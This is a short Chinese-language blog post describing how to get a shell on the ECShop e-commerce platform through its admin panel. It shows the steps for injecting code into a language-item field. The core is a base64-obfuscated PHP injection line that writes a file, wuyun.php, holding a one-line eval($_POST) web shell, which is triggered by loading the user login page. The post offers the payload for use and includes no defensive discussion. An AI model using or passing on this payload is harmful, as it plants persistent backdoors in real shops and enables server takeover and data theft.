Ecshop后台getshell

进入后台打开>模版管理>语言项编辑:
ecshop

搜索关键字(这里我搜索的字母"p"):
ecshop1
插入代码:
[php]
${${fputs(fopen(base64_decode(d3V5dW4ucGhw),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbZnVja10pPz4))}}
[/php]
效果访问生成
ecshop2
打开用户登录界面(因为我们添加的地方是用户信息)
ecshop3
访问后生成wuyun.php
[php]

[/php]
ecshop4

发表评论